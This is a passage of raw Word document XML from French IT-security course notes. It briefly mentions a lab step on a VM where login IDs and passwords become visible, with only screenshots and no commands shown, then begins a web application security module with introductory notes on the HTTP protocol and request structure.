        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FD49623" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4990A038" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C5F6693" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02EEF444" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="241D8688" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BBEE13C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04D36C67" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DF26856" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17997892" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75B33DE5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="785A779E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41ABEB4C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B6EA908" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F57A3B9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4030C7F3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251681792" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="4F06B623" wp14:editId="4F862F36">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1200150</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>238125</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1342008" cy="335502"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="6" name="Rectangle 6"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="823425" y="711750"/>
                          <a:ext cx="2933700" cy="720600"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="9525" cap="flat" cmpd="sng">
                          <a:solidFill>
                            <a:srgbClr val="00FF00"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                          <a:round/>
                          <a:headEnd type="none" w="sm" len="sm"/>
                          <a:tailEnd type="none" w="sm" len="sm"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="00CF4243" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B7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4F06B623" id="Rectangle 6" o:spid="_x0000_s1045" style="position:absolute;left:0;text-align:left;margin-left:94.5pt;margin-top:18.75pt;width:105.65pt;height:26.4pt;z-index:2516817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" filled="f" strokecolor="lime">
                <v:stroke startarrowwidth="narrow" startarrowlength="short" endarrowwidth="narrow" endarrowlength="short" joinstyle="round"/>
                <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                  <w:txbxContent>
                    <w:p w14:paraId="00CF4243" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:jc w:val="center"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7383A7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C8E775C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:t xml:space="preserve">On </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:t>vas</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:t xml:space="preserve"> tester sur Twitter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7085C828" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="575C8829" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="69CE03EE" wp14:editId="1F79AF15">
            <wp:extent cx="5731200" cy="3835400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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731200" cy="3835400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E080D0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26BA5EF7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:t xml:space="preserve">On rentre </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:t>l’ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la VM </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:t>est  on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:t xml:space="preserve"> arrive sur la page d’authentification : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D9F46F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1A3E8881" wp14:editId="6C078877">
            <wp:extent cx="4348163" cy="3560871"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8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4348163" cy="3560871"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="028323D7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="780B21A2" wp14:editId="5E162CF9">
            <wp:extent cx="5731200" cy="22352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31200" cy="2235200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C029697" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:t xml:space="preserve">On voit les id et </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A581480" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70171D6E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41D1083C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B35C8A1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="295E925F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C21FDBC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F0FEA1E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10954C0E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A936FAE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="153041B4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7755418C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CC089AE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="216E8864" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2873364D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66F6F6DF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B69AD1E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10232527" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F55070F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BFCA5A2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="566B3A3A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AA59F01" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ED1E4B1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="053F59C2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A6319E7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76E5961F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60BD0FFB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="501AFF9A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36CC949B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="616DDA18" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E54B81D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="232811DE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5342499D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="310EEF51" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24FFC3C1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="030587FA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_t6s9tl3312ro" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="85"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> Module 10 - sécurité des application WEB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063E3287" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B251B12" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="798C4A95" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_k3ru4rbued8k" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="86"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>Chapitre  1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Comprendre le protocole HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16162AE8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6B78D062" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Protocole de transmission permettant à l'utilisateur d'accéder à des pages web par l'intermédiaire d'un navigateur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DF3218" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="51918B2C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="13C846AB" wp14:editId="054BCB6B">
            <wp:extent cx="3590925" cy="2571750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="56" name="image32.gif"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image32.gif"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3590925" cy="2571750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="579509A0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_z67tnheo5g0p" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="87"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">1 - Comment fonctionne le protocole HTTP ? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9F1585" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="71095359" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Client - &gt; Navigateur -&gt; Serveur WEB </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCF7AD7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6BA8472B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="31BF3E40" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_3h7vbsy6imyx" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="88"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">2 - Structure d’une requête HTTP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C3DA05" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="448FB135" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ligne de requête : URL version du protocole </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578E0B5B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En Têtes : Informations sur le client infos sur le type de contenu accepté par le client </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F56785F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Corps : Données sur les formulaires HTML </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FIchiers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> téléchargés. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3354DE4E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="59E131AC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="2F3B7D6F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_qf6b8strye27" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="89"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
